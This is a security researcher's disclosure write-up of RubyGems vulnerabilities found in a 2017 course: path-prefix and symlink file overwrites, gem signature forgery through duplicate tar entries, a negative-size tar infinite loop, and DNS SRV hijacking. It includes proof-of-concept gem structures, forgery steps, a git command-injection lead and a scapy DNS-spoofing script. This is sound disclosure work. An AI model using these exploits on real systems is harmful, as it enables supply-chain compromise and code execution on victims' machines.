RubyGems bugs

David Fifield <david@bamsoftware.com>

updated
updated
updated
updated

Some security bugs in RubyGems. Nathan Malkin and I found these when we were working together in Doug Tygar's Fall 2017 CS 294-138 course on penetration testing. Our class presentation covers two of the bugs. Most of these bugs were fixed in RubyGems 2.7.6.

It's a little hard to define what counts as a "bug" in a program like RubyGems, whose whole purpose is to download code and execute it. Even just gem install can run arbitrary malicious code through extconf.rb. (See also.) We therefore looked for things that were unambiguously unexpected: for example even a malicious gem should be safe to simply inspect, as long as you don't try to install or run it.

Ideas for bug hunters

Here are some leads that we didn't fully pursue. They may give you some ideas if you're looking for new bugs.

Git command injection

RubyGems has some kind of support for downloading gems via Git. However, the functionality doesn't appear to be exposed at all(?)—it seems to need an extension to make it work. But Bundler, which is somehow integrated with RubyGems, allows downloading from Git repositories, and it has problems with command line sanitization. For example, try providing --help where Bundler expects a URL:

$ echo "gem 'rack', :git => '--help'" > Gemfile
$ bundler install
Fetching --help
error: unknown option `bare'
usage: git help [--all] [--guides] [--man | --web | --info] [<command>]

    -a, --all             print all available commands
    -g, --guides          print list of useful guides
    -m, --man             show man page
    -w, --web             show manual in web browser
    -i, --info            show info page
Retrying `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \
  --bare --no-hardlinks --quiet` due to error (2/4): \
  Bundler::Source::Git::GitCommandError Git error: command \
  `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \
  --bare --no-hardlinks --quiet` in directory /home/user/test/git has failed.error: unknown option `bare'

We couldn't find a way to get command execution. A promising direction is setting a configuration option, some of which control command execution, using the -c option. For example,

$ git clone -ccore.sshCommand=date 'ssh://localhost/foo'
Cloning into 'foo'...
/bin/date: extra operand ‘git-upload-pack '/foo'’
Try '/bin/date --help' for more information.
fatal: Could not read from remote repository.

Decompression bomb

RubyGems deals with lots of gzip-compressed data. In some contexts, it handles decompression in a streaming manner, using Zlib::GzipReader; but in others, it tries to decompress completely in memory, using Zlib::Inflate. This potentially makes it vulnerable to decompression bombs. bomb.rb outputs some highly compressed gem files.

$ ulimit -v 1000000
$ ruby bomb.rb
$ ls -lgoh bomb-10000000000.gem
-rw-r--r-- 1 9.3M Nov 13  2017 bomb-10000000000.gem
$ gem spec bomb-10000000000.gem
/usr/lib/ruby/2.3.0/rubygems/package.rb:445:in `read': failed to allocate memory (NoMemoryError)

I tried running my own copy of the rubygems.org code, and uploading such a highly compressed gem to it. There seemed to be some kind of memory or CPU time limiter running by default, though, so it didn't seem to actually do any harm.

Stub specification parsing

Gem metadata is usually stored as YAML in the file metadata.gz inside the gem tar container. But after being installed, a subset of the metadata is redundantly stored in a stub specification, a formatted comment at the top of the specifications/*.gemspec YAML file. Its purpose (I think) is to be faster to parse than the entire gemspec, for common operations where only part of the metadata is needed. Of course having two sources for the same data carries the risk that they will get out of sync. A stub specification looks like this:

# stub: tzinfo 1.2.3 ruby lib

The four parts are, in order: name, version, platform, and require_path. The parts are parsed by splitting on whitespace.

A strange thing happens if a gem file happens to have a version number that is an empty string (as in #270068 below): the stub will look like this:

# stub: tzinfo  ruby lib

Because the stub is parsed by splitting on whitespace, this gets misparsed as version="ruby", platform="lib". This bug led to a crash in all gem commands, once a single stub with an empty version had been installed. The fix for the crash, though, is clearly wrong. Here is the pre-fix code, in pseudocode:

parts = stub.split(" ")
name = parts[0]
version = parts[1]
platform = parts[2]
require_path = parts.last

The fix changes it to this:

parts = stub.split(" ")
name = parts[0]
if parts[1] parses as a version number:
    version = parts[1]
else:
    version = "0"
platform = parts[2] # BUG
require_path = parts.last

They didn't shift the following assignment to account for the missing version number. It should rather be:

parts = stub.split(" ")
name = parts[0]
if parts[1] parses as a version number:
    version = parts[1]
    platform = parts[2]
    require_path = parts.last
else:
    version = "0"
    platform = parts[1]
    require_path = parts.last

The upshot is that you end up with platform being set to some controllable string (what should be treated as require_path), and different from what's stored in the YAML.

RubyGems.org username/user ID confusion

Users at rubygems.org are identified by both a numeric user ID and a username. For example, both of these point to the same user:

The only thing separating user IDs and usernames is their syntax: user IDs must start with a digit, and usernames must not. Throughout the code, both forms of identification are mostly interchangeable, returning results if either the user ID or the username matches. If you could subvert the username checks, and create an account with a numeric username, it would be interpreted on the server as a user ID, and you could probably gain the privileges of another user.

SRV interference with s3 URLs

Update : whatever vulnerabilities that may have existed with SRV lookups disappared when SRV lookups were removed in October 2018. See RubyGems news. It turns out that file URLs were vulnerable.

The gem command issues a DNS SRV query, the response to which may override the URL from which gems are downloaded. The dodginess of the feature and the fragility of its verification are described more here. I could not find a serious, plausible vulnerability in the code with respect to http or https URLs, partly because the overridden host component has to be a subdomain of the original domain. But gem also supports s3 URLs and with those I made more progress.

The observations in this section are based on the code as of commit 7a49f405dd, .

A user who has configured an s3 source probably has configured their .gemrc like this:

# https://github.com/rubygems/rubygems/pull/1134
:sources:
- s3://mybucket/
s3_source: {
  mybucket: {
    id: "my_id",
    secret: "my_secret"
  }
}

With such a configuration, gems will not be fetched from the default https://rubygems.org/gems/, but from https://mybucket.s3.amazonaws.com/gems/. The funny thing is, gem will do the DNS SRV thing even when using an s3 source. Instead of _rubygems._tcp.rubygems.org, the DNS SRV query will be for _rubygems._tcp.mybucket. Suppose the response is not.mybucket: it passes the subdomain check, and the constructed URL will be https://not.mybucket.s3.amazonaws.com/gems/. The not.mybucket bucket may be owned by a completely different user (i.e., an attacker) than the expected mybucket bucket. On its own, this doesn't work, because there are no credentials for not.mybucket in .gemrc (the error message is "no key for host not.mybucket in s3_source in .gemrc"). We can work around that by providing the credentials in the URL: the DNS SRV response should be attackerusername:attackerpassword@not.mybucket.

This is so, so close to being a working exploit. There's just one problem: the wildcard certificate for *.s3.amazonaws.com doesn't match the double subdomain. If you try it, gem fails with the error "SSL_connect returned=1 errno=0 state=error: certificate verify failed (certificate rejected)". I tried also setting :ssl_verify_mode: 0 in .gemrc, but that doesn't seem to affect this particular request.

The AWS documentation says that bucket names containing a dot don't work with HTTPS: "When using virtual hosted–style buckets with SSL, the SSL wild card certificate only matches buckets that do not contain periods." But that's really the only thing preventing hijacking of s3 fetches. If gem were ever modified to use the alternative style of URL, https://s3.amazonaws.com/mybucket/gems/, it would become vulnerable.

I suspect that a sufficient fix for this is to disable the DNS SRV thing for s3 sources. s3 bucket names don't have the same ownership relationship as subdomains.

Installer can modify other gems if gem name is specially crafted

This is a fairly weak vulnerability, a limited file overwrite. It takes advantage of the code incorrectly using string prefix comparison to determine subdirectory containment. If you can convince someone to install a gem file whose name is a prefix of some other important gem file, you can overwrite that other important gem file. This vulnerability was assigned CVE-2018-1000079. It is reminiscent of, but weaker than, report #243156 by Yusuke Endoh, which could overwrite any gem file regardless of name.

There's a small bug in the report: it says that deleting an existing gem could lead to code execution. The other two things could lead to code execution, but just deleting a gem would not.

The fix f83f911e19 went into RubyGems 2.7.6. It just appends a '/' before doing the string prefix check, as we suggested. (Maybe it would have been better to use File::SEPARATOR instead?)


The install_location function allows writing to certain files outside the installation directory.

The install_location function in lib/rubygems/package.rb attempts to ensure that files are not installed outside destination_dir. However the test it employs, a string comparison using start_with?, fails to prevent the case when destination_dir is a prefix of the path being written.

Example that should be prevented but is allowed:

install_location '../install-whatever-foobar/hello.txt', '/tmp/install'
# outputs '/tmp/install-whatever-foobar/hello.txt'

gem install always constructs destination_dir as '#{name}-#{version}', so the vulnerability cannot overwrite arbitrary files. However, a malicious gem with name='rails' and an empty version number (version=''), for example, could overwrite the files of any other gem whose name begins with rails-, like rails-i18n or rails-letsencrypt.

Proof of concept

The attached ra.gem demonstrates the vulnerability. It assumes that some other gems have already been installed.

gem install --install-dir=/tmp/install rails-i18n rails-letsencrypt rails-html-sanitizer
gem install --install-dir=/tmp/install ra.gem

The malicious gem will do three things, each of which could potentially lead to code execution:

The structure of the gem file reveals how the attack works:

$ tar -xvf ra.gem
metadata.gz
data.tar.gz
$ gzip -dc metadata.gz | head -n 4
--- !ruby/object:Gem::Specification
name: rails
version: !ruby/object:Gem::Version
  version: ''
$ tar -tvf data.tar.gz
-rw-r--r-- 0/0              12 1969-12-31 16:00 README
drwxr-xr-x 0/0               0 1969-12-31 16:00 ../rails-letsencrypt-0.5.3/
-rw-r--r-- 0/0              12 1969-12-31 16:00 ../rails-i18n-5.0.4/lib/rails_i18n.rb
lrw-r--r-- 0/0               0 1969-12-31 16:00 ../rails-html-sanitizer-1.0.3 -> /tmp/attacker-controlled

Remediation

A sufficient fix is to append a directory separator to destination_dir before doing the start_with? check.

diff --git a/lib/rubygems/package.rb b/lib/rubygems/package.rb
index c36e71d8..f73f9d30 100644
--- a/lib/rubygems/package.rb
+++ b/lib/rubygems/package.rb
@@ -424,7 +424,7 @@ EOM
     destination = File.expand_path destination

     raise Gem::Package::PathError.new(destination, destination_dir) unless
-      destination.start_with? destination_dir
+      destination.start_with? destination_dir + '/'

     destination.untaint
     destination

Attached files

Unpacker improperly validates symlinks, allowing gems writes to arbitrary locations

Using a symbolic link that points outside of the install directory, a gem could overwrite any named file with arbitrary contents. It's simple to execute but powerful, overwrite of arbitrary files as root. But then again, if you can convince someone to install any malicious gem file, you can get root trivially, no symlink tricks required. So what makes this vulnerability special? Just that it affects even gem unpack—even trying to inspect the gem file is dangerous, even if you don't install or run it. This vulnerability was assigned CVE-2018-1000073.

It turns out GNU tar had this exact same bug way back in 1998 (CVE-2002-1216):

tar "features" from Willy Tarreau
lrwxrwxrwx willy/users       0 Sep 21 11:34 1998 include -> /etc
-rw-r--r-- willy/users     758 Sep 21 11:40 1998 include/profile

The commits 1b931fc03b and 666ef793ca, part of RubyGems 2.7.6, attempt to fix this vulnerability. If you ask me, the fix is unsatisfying. It uses File::realpath, just like the old code, which is good as far as it goes, but for old versions of Ruby without realpath it just silently falls back to the old vulnerable code. They also use string operations (start_with?) to try and determine subdirectory containment, which is exactly what led to #270068. There may still be vulnerabilities here.


The RubyGems installer attempts to prevent a gem from writing any files outside the install directory; however it is possible to bypass the check with a symbolic link in a crafted gem.

Example structure of malicious gem

$ tar -xvf symlink.gem
metadata.gz
data.tar.gz
$ tar -tvf data.tar.gz
-rw-r--r-- 0/0              12 1969-12-31 16:00 README
lrw-r--r-- 0/0               0 1969-12-31 16:00 link -> /tmp
-rw-r--r-- 0/0               6 1969-12-31 16:00 link/HACKED

Proof of concept

Using the attached symlink.gem:

gem install symlink.gem
# or
gem unpack symlink.gem

This will create a file /tmp/HACKED.

Impact

The name and contents of the written file, as well as the file permissions, are arbitrary. Using this technique, an attacker could easily get code execution, for example by overwriting a system binary or writing into a user's .profile.

Note that the exploit will even work with gem unpack, which is supposed to be safe of system-level side-effects.

For comparison, this exploit is more powerful than #243156 (and #270068) as the target directory doesn't need to contain a dash.

Root cause

The code in install_location is supposed to check if the target filename is outside the destination directory. It does this by fully resolving (using File.realpath) the destination directory and then seeing if the target filename that directory.

This test succeeds for a symlink that points outside the gem's install directory, because its "destination directory" is the directory where it's located (not where it points), which is local.

The test also succeeds for a file that uses the symlink to "escape" the local directory, because the symlink really is its prefix.

However, in combination, these files can allow for arbitrary writes, as shown.

The root cause vulnerability is the ability of symlinks to point outside the gem. This was actually forbidden in a commit from 2015, but was made more permissive in a later commit, creating this vulnerability.

Suggested remediation

The course of action we recommend is to (again) disallow symlinks that point outside the gem directory.

Attached files

api_endpoint allows URI syntax in DNS SRV response

Update : RubyGems removed SRV lookups in October 2018, removing this class of vulnerability. See RubyGems news. This bug report was about http and https URLs; see also the impact on s3 URLs and file URLs.

RubyGems has had a funny and little-known feature of making a DNS SRV request to find an alternate download server other than the default api.rubygems.org. As you might expect, seeing as a local attacker can spoof SRV responses, such as feature is hard to make secure. Despite past vulnerabilities and resultant additional security checks, we found news ways to mess with the address that a client connects to, though none that obviously leads to code execution.

The relevant piece of code has a long history of security vulnerabilities:

March 2012
      URI.parse "#{res.target}#{uri.path}"

Adds the feature to do a SRV lookup to check for an alternative API hostname. The stated rationale is that the feature "allows for the usage of short, simple source names (like https://rubygems.org) with specific api endpoint names, which improves load balancing." There are no security checks in this version: anyone who can spoof a SRV response and can get you to download gems from their chosen location. The feature first appears in RubyGems 2.0.

May 2015
      target = res.target.to_s.strip

      if /#{host}\z/ =~ target
        return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
      end

Jonathan Claudius reports (HackerOne) the DNS spoofing vulnerability, which becomes CVE-2015-3900. The intended fix was that the DNS reply should be restricted to being a subdomain of the original requested domain; e.g. "rubygems.org" is allowed to become "api.rubygems.org", but not to become "evil.hacker.example". The first attempt at a fix used a regular expression, /#{host}\z/, to try to ensure that the SRV response ends with the original hostname. This change went into RubyGems 2.4.7.

      target = res.target.to_s.strip

      if /\.#{Regexp.quote(host)}\z/ =~ target
        return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
      end

But the regular expression fix was incomplete: not only did it allow "rubygems.org" to become "evilrubygems.org", it also allowed an attacker to control regular expression metacharacters and therefore match almost anything. This was CVE-2015-4020. A followup fix changed the regular expression to /\.#{Regexp.quote(host)}\z/, which ensures that there's a dot before the domain, and escapes metacharacters. This further fix went into RubyGems 2.4.8 in June 2015. However, the code remained vulnerable to a slightly modified attack.

April 2017
      target = res.target.to_s.strip

      if URI("http://" + target).host.end_with?(".#{host}")
        return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
      end

Jonathan Claudius reported a problem with the regular expression fix. The regular expression /\.#{Regexp.quote(host)}\z/ is fine for making sure that a hostname ends with a dot and then host. But the problem was that the string was not treated purely as a hostname; it was pasted into the middle of a string that was then parsed as a URL. An attacker could return a string like "evil.hacker.example/api.rubygems.org", which would pass the check because it ends in ".rubygems.org", but would be parsed into the URL "https://evil.hacker.example/api.rubygems.org". This vulnerability was CVE-2017-0902.

The developers' reaction was to take the SRV response, parse it as a URL, extract the host component, and compare that against the expected host. The fix shipped four months later in RubyGems 2.6.13. (It was while looking at this particular fix, and the others in 2.6.13, that I realized there were likely more bugs lurking in RubyGems.)

October 2017
That brings us to this report. The fix from 2.6.13 still has some weird properties. After validating the host, the code pastes the entire SRV response (not just the host part that it had validated) into the middle of a URL string. This means that an attacker can freely control the path, query, fragment, etc. components.
October 2018
RubyGems removes the SRV lookup feature.

Here is the message I sent to security@rubygems.org:

I was looking at commit 8d91516fb7037ecfb27622f605dc40245e0f8d32, which was the fix for the DNS hijacking issue CVE-2017-0902. The function still handles the DNS response in a potentially unsafe way. I did not find any actual vulnerabilities in the current code; the code that uses the result of api_endpoint (perhaps coincidentally) discards the potentially malicious components of the URI that api_endpoint returns. But future code may be vulnerable. I'm sending this to the security list because my checks for vulnerability may be incomplete.

The problem is that api_endpoint allows the DNS SRV response to contain URI-like syntax (which was the cause of CVE-2017-0902). The fix was to parse the syntax as if it were a URI, extract the host component, and only do a comparison using the host component, rather than the entire string. However, the entire string is still pasted into the return value, assuming the comparison succeeds. It can contain URI syntax characters like ? and # that change the interpretation of what follows them.

I'm attaching a patch that adds a new test and changes api_endpoint to discard everything but the host after parsing the DNS SRV response as a URI. It would probably be even better simply to disallow any syntax other than hostname literals.

The lines that I initially thought was vulnerable, but appear not to be, are in lib/rubygems/source.rb:

The reason they are not vulnerable is that api_url is a URI object rather than a string, so the + operator is actually the merge method rather than string concatenation. The merge operator replaces any existing path, query, and fragment components, it seems. (It would not help if the attacker-provided string changed the URI's host, pass, or port components, but I could not think of a realistic path to exploitation using only those components.) However if api_uri had been coerced into a string, then the code would be vulnerable. An attacker could cause the client to download some other path, which could possibly lead to a downgrade attack or replacing one gem with another.

And the commit log for the included patch, which was lost when the report got turned into a pull request.

The api_endpoint function inserts an untrusted string into the middle of a URI:

URI.parse "#{uri.scheme}://#{target}#{uri.path}"

The intention is that target only replaces the host component of the URI; for example if uri.scheme = "https" and uri.path = "/path", and target = "example.com", then the result will be

https://example.com/path

But target could contain other URI syntax that masks uri.path. For example, if target = "example.com/badpath?query=", then the result will be

https://example.com/badpath?query=/path

If target = "example.com/badpath#fragment", then the result will be

https://example.com/badpath#fragment/path

Additionally, target = "example.com:9999" could change the port:

https://example.com:9999/path

or target = "user:pass@example.com" could change credentials:

https://user:pass@example.com/path

Returning a URI with an attacker-controlled path/query/fragment is potentially dangerous if used directly or if other URIs are created from it using string concatenation. For example, if api_endpoint returns "https://example.com/malicious.gz#", and some other code tries to create a new URI by appending "/good.gz", then the resulting URI will be https://example.com/malicious.gz#/good.gz, with the intended path being hidden in the fragment component of the URI. However, I did not find any places in the code where this happens; code that on first glance looks vulnerable:

    spec_path  = api_uri + "#{file_name}.gz"

is actually safe because the + is not string concatenation, but the merge method of URI::Generic. It is still possible to replace the user, password, and port, but those do not offer an obvious path to exploitation.

Probably it's better not to parse target as a URI at all; rather to insist that it have the form of a hostname only.

Commit 8d91516fb7037ecfb27622f605dc40245e0f8d32 began parsing target as a URI in order to compare the host component as a fix for CVE-2017-0902; however it does not discard components other than the host when building the result.

Gem signature forgery using duplicate filenames

RubyGems supports developer signatures on gem files. Signatures for the various components of a gem are stored alongside them, directly inside the gem tar container. Ambiguous processing of multiple tar entries with the same filename enabled transferring any existing legitimate signature onto arbitrary contents.

It turns out that, in practice, essentially no developers actually sign their gems. A minor challenge in preparing the report was finding a gem—any gem—with a valid and current signature. Even if developers signed their gems, the default client behavior is not to verify signatures.

The fix f5042b8792 went into RubyGems 2.7.6. All it does is disallow duplicate filenames in a tar file, which seems to be sufficient. For some reason they didn't take our patch that adds tests. The fix is only partial: while it's no longer possible to attach someone else's signature to your own contents, you can still mix and match signed data and metadata files.

This vulnerability was assigned CVE-2018-1000076. Our report got us a $1000 bounty.


Summary

Inconsistencies in how gem processes gem files make it possible to reuse a signature from an existing signed gem and apply it to arbitrary contents. The forged gem will install even with -P HighSecurity.

The attached file multi_json-1.12.2.gem is a forged version of the genuine multi_json-1.12.2.gem gem with faked contents (just a single text file called HACKED). Here is how to check it. You must first trust the original developer's public key.

$ gem --version
2.5.2
$ wget https://raw.githubusercontent.com/intridea/multi_json/master/certs/rwz.pem
$ gem cert --add rwz.pem
Added '/CN=pavel/DC=pravosud/DC=com'
$ gem install --install-dir install -P HighSecurity multi_json-1.12.2.gem
Successfully installed multi_json-1.12.2
1 gem installed
$ ls install/gems/multi_json-1.12.2/
HACKED

Details

The vulnerability stems from inconsistencies in how gem interprets the entries of the tar container. A tar file may contain multiple entries with the same name. When there are two data.tar.gz entries, for example, gem will honor the second one when verifying the signature, but the first one when installing files. The proof of concept gem uses this trick: it prepends an additional data.tar.gz entry to the genuine multi_json-1.12.2.gem. (The attached forge-gem.sh script was used to make it.)

$ tar tvf multi_json-1.12.2.gem
-r--r--r-- wheel/wheel     163 2017-10-05 16:05 data.tar.gz
-r--r--r-- wheel/wheel    1840 2017-09-04 21:51 metadata.gz
-r--r--r-- wheel/wheel     256 2017-09-04 21:51 metadata.gz.sig
-r--r--r-- wheel/wheel   16908 2017-09-04 21:51 data.tar.gz
-r--r--r-- wheel/wheel     256 2017-09-04 21:51 data.tar.gz.sig
-r--r--r-- wheel/wheel     270 2017-09-04 21:51 checksums.yaml.gz
-r--r--r-- wheel/wheel     256 2017-09-04 21:51 checksums.yaml.gz.sig

A similar bug affects checksums.yaml.gz: checksums are read from the first such entry, while the signature is verified on the last. This table summarizes the inconsistencies:

fileextract_files usesverify uses
data.tar.gzfirstlast
checksums.yaml.gzfirstlast
metadata.gzlastlast

Source code references

Here are the pieces of code that are responsible for the inconsistencies in processing.

extract_files takes the first data.tar.gz entry:

  def extract_files destination_dir, pattern = "*"
    verify unless @spec

    FileUtils.mkdir_p destination_dir

    @gem.with_read_io do |io|
      reader = Gem::Package::TarReader.new io

      reader.each do |entry|
        next unless entry.full_name == 'data.tar.gz'

        extract_tar_gz entry, destination_dir, pattern

        return # ignore further entries
      end
    end
  end

read_checksums seeks to the first checksums.yaml.gz entry:

  def read_checksums gem
    Gem.load_yaml

    @checksums = gem.seek 'checksums.yaml.gz' do |entry|
      Zlib::GzipReader.wrap entry do |gz_io|
        YAML.load gz_io.read
      end
    end
  end

verify_files and verify_entry iterate over all entries in the tar file, filling in @signatures and @digests. In the case of entries with duplicate names, it overwrites previous values, meaning that the last result wins. verify_entry also handles metadata.gz, calling load_spec afresh each time:

  def verify_entry entry
    file_name = entry.full_name
    @files << file_name

    case file_name
    when /\.sig$/ then
      @signatures[$`] = entry.read if @security_policy
      return
    else
      digest entry
    end

    case file_name
    when /^metadata(.gz)?$/ then
      load_spec entry
    when 'data.tar.gz' then
      verify_gz entry
    end
  rescue => e
    message = "package is corrupt, exception while verifying: " +
              "#{e.message} (#{e.class})"
    raise Gem::Package::FormatError.new message, @gem
  end

verify_checksums and verify_signatures operate only on the precomputed @checksums, @signatures, and @digests.

Incidentally, get_metadata, used by the unpack command, has its own extractor for metadata.gz, but it happens to grab the last entry, just like verify_files.

Mitigation

The attached patch 0001-Add-tests-that-Gem-Package-verify-checks-duplicate-f.patch adds two new tests (both currently failing) that check signature verification when bogus files come before or after the genuine files.

The essential mitigation is to ensure that there is no ambiguity when processing a tar file that has multiple entries for the same file name. E.g., "data.tar.gz" must refer to one and only one entry in the tar file. One way to do it would be to set a policy in the code: e.g., last entry always wins (which would be consistent with the tar command). But that would be hard to enforce, especially in new code going forward. Another way would be not to permit duplicate entries; e.g., verify_entry could check whenever it is about to overwrite something in @signatures, @digests, or @spec, and return an error. This needs some care, as metadata and metadata.gz are both processed equivalently. It is possible, using symlinks, to create entries that effectively point to the same file, even though the paths differ; e.g.:

data.tar.gz
dir/ -> ..
dir/data.tar.gz

But this shouldn't be a problem for gem, as long as it continues to use strict string equality with unadorned paths like "data.tar.gz".

Even when this bug is fixed, a weaker form of signature forgery is possible. There is nothing in a gem file that binds data.tar.gz and metadata.gz together: they are signed independently. It is possible to mix and match files from different signed gems. Suppose a signed gem example-1.0 has a security vulnerability, and the authors release a new signed update example-1.1. Someone (perhaps a malicious rubygems.org admin) could forge a gem containing data.tar.gz from example-1.0 and metadata.gz from example-1.1. Users would think they are running the updated code, but they are still running the old vulnerable code. Fixing this weaker form of forgery seems like it would require a redesign of the signature format. Ideally, the signature would be over the entire gem, and verified before any unpacking.

It seems that not many people are sign their gems or verify signatures. For most users the possibility of signature forgery doesn't put them at additional risk beyond the (already risky) status quo. The flaw affects only those users who use the MediumSecurity or HighSecurity profiles.

Attachments

How to run forge-gem.sh:

$ gem fetch multi_json
$ mkdir orig
$ mv multi_json-1.12.2.gem orig/
$ echo hacked > HACKED
$ tar czf data.tar.gz HACKED
$ ./forge-gem.sh orig/multi_json-1.12.2.gem data.tar.gz forged.gem

Be aware that if the original multi_json-1.12.2.gem and the new forged.gem are both in the same directory, then gem install ./forged.gem will—for some reason—install multi_json-1.12.2.gem instead. You have to hide the original file in another directory first.

Negative size in tar header causes infinite loop

The bug was a parsing bug that allowed certain fields in tar files to be negative or have other weird formats, a consequence of which was that you could make some commands go into an infinite loop. This vulnerability was assigned CVE-2018-1000075. The commit 92e98bf8f8 that fixed this bug shipped in RubyGems 2.7.6.

Because Ruby doesn't have a tar package in the standard library, a lot of other Ruby software imports Gem::Package::TarReader in order to use RubyGems' tar-handling code (as recommended here, here, and here, for example). So in practice, the code is used on generic tar files, not just specially formatted gem files. Fixing the infinite-loop bug caused a problem for someone who was trying to parse a different flavor of tar files; presumably past versions of RubyGems silently returned garbage for certain fields in such formats, rather than signaling an error.

The minitar library was also vulnerable.


Proof of concept

The attached file loop.gem causes an infinite loop in any command that tries to iterate over the entries in the tar container.

gem install loop.gem
gem unpack loop.gem
gem specification loop.gem

Summary

Gem::Package::TarHeader.from uses oct to parse fields in the tar header. oct does more than just parse octal digits, for example it permits these unexpected syntaxes:

The ability to encode negative values enables a DoS (infinite loop) in the tar reader. The proof-of-concept loop.gem has a size field of -0000001000\x00, or −512. The negative size causes Gem::Package::TarReader.each to seek backwards after reading the header, so it reads the same header over and over.

I suppose one could cause a lot of CPU usage on the rubygems.org server by uploading copies of loop.gem, but I didn't try it.

Remediation

Instead of doing the conversion using oct, there could be a special-purpose function that validates its input better. It might be enough to check that the string matches /\A[0-7]+\z/ before calling oct.

The attached patch file adds a test that Gem::Package::TarHeader.from rejects various bogus syntax.

DNS SRV lookup of file:// sources enables local hijacking of gems

RubyGems's DNS SRV lookup feature was questionable from a security perspective, but we did not find an actual working exploit for http and https sources, nor for s3 sources. However, for file:// sources, I did find an exploit, though it only works under a narrow set of conditions.

SRV lookups were removed in October 2018, eliminating this whole class of potential vulnerabilities.

This report was awarded a $500 bounty.


Summary

gem makes a DNS SRV query for each of its configured sources; the response is allowed to override the source URL in certain ways. The SRV query happens not only for http:// and https:// sources, but also for s3:// and file://. In the case of file://, the SRV response may add a prefix to the local filesystem path from which gems are fetched. As a consequence, an attacker who can provide or spoof DNS responses, and can write to the local filesystem, may cause a victim to download fake gems with arbitrary contents.

Demonstration

Here is how an attacker may hijack a victim's installation of the minitest gem. The users attacker and victim share the same local filesystem. victim expects to install gems from /home/victim/trusted-gem-path, but attacker will force the installation to be from /tmp/attack/home/victim/trusted-gem-path instead.

First, victim sets up a file:// repo. This could also be done by some other party, like a local administrator.

victim$ mkdir -p /home/victim/trusted-gem-path/gems
victim$ (cd /home/victim/trusted-gem-path/gems && gem fetch --clear-sources --source https://rubygems.org/ minitest)
victim$ gem generate_index -d /home/victim/trusted-gem-path

Then attacker makes a malicious gem file and installs it under a prefix where attacker can write and victim can read. We'll use /tmp/attack.

# Make a malicious gem
attacker$ mkdir lib
attacker$ echo 'puts "hacked"' > lib/hacked.rb
attacker$ cat <<EOF > hacked.gemspec
Gem::Specification.new do |s|
  s.name = 'minitest'
  s.version = '5.11.3'
  s.files = ['lib/hacked.rb']
end
EOF
attacker$ gem build --force hacked.gemspec
# Make it available under /tmp/attack
attacker$ mkdir -p /tmp/attack/home/victim/trusted-gem-path/gems
attacker$ cp minitest-5.11.3.gem /tmp/attack/home/victim/trusted-gem-path/gems
attacker$ gem generate_index -d /tmp/attack/home/victim/trusted-gem-path

Next, attacker runs a program to spoof SRV responses. This will require root privileges if run on the same host, but it could also be done from another host in the same local network. The attacker may even control the local DNS, for example by being the wi-fi admin.

#!/usr/bin/env python3

from scapy.all import *

TARGET = b"xxx./tmp/attack"

def respond(pkt):
    if not (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
        return
    q = pkt[DNSQR]
    # Nothing after "_rubygems._tcp." indicates that the host is empty;
    # i.e., that it's likely a lookup for a file:// URL. 33 == SRV.
    if not (q.qname == b"_rubygems._tcp." and q.qtype == 33):
        return
    resp = IP(src=pkt[IP].dst, dst=pkt[IP].src) \
        / UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport) \
        / DNS(qr=1, id=pkt[DNS].id, qd=q, ancount=1) \
        / DNSRRSRV(type=33, rrname=q.qname, ttl=30, priority=0, weight=1, port=80, rdlen=8+len(TARGET), target=TARGET)
    send(resp)

sniff(filter="udp dst port 53", prn=respond)

Finally, victim tries to fetch a gem and specifically asks for their previously configured file:// source. attacker's SRV response adds a /tmp/attack prefix and victim ends up with a malicious gem.

victim$ gem fetch --clear-sources --source file:///home/victim/trusted-gem-path minitest
victim$ tar -O -xf minitest-5.11.3.gem -- data.tar.gz | tar tzf -
lib/hacked.rb

Analysis

The api_endpoint function takes a URL, extracts the host component, and then issues a SRV query for _rubygems._tcp.#{host}. Its usual purpose is to replace "rubygems.org" with "api.rubygems.org" in http:// and https:// URLs; but it is also called for s3:// and file:// URLs. In a typical file:// URL, the host component is empty, so the query will be for _rubygems._tcp..

api_endpoint has the property that it allows limited control of parts of the URL other than the host component: in particular you can add a prefix to the path component by including / characters in the SRV response. The attack works by sending a SRV response of xxx./tmp/attack. The xxx. can be anything, as long as it ends with a . in order to pass the subdomain check. Receiving such a response, api_endpoint transforms the input URL

file:///home/victim/trusted-gem-path

into the output URL

file://xxx./tmp/attack/home/victim/trusted-gem-path

In the output URL, the xxx. is technically the host component, but it doesn't matter because it is ignored.

The conditions for exploitation seem fairly narrow:

I don't know how common such conditions are. While gem supports file:// sources, I wasn't able to find much information on configuring them other than one bug report. It seems it's more common to do a shared repository over http than using a shared filesystem. Commit 37d486cfd9 says "bundler gemspecs use file:// URIs for their sources," but I could not find in Bundler where that happens.

Remediation

The best solution seems to be not to call api_endpoint for file:// (and s3://) URLs. The host component of such URLs doesn't have the same meaning as it does in http:// and https:// URLs.

A mitigation that in this case would be sufficient would be to apply stricter validation of SRV responses, not allowing them to modify any components other than the host (GitHub #2035, HackerOne #274267).

Impact

The CVSS calculator says the severity is "high" but I would put it at "low" because of the difficulty of execution. The impact is indeed bad: arbitrary code execution using the victim's privileges, whether through Ruby code or a C extension. But as far as I can tell, the conditions for exploitation are uncommon.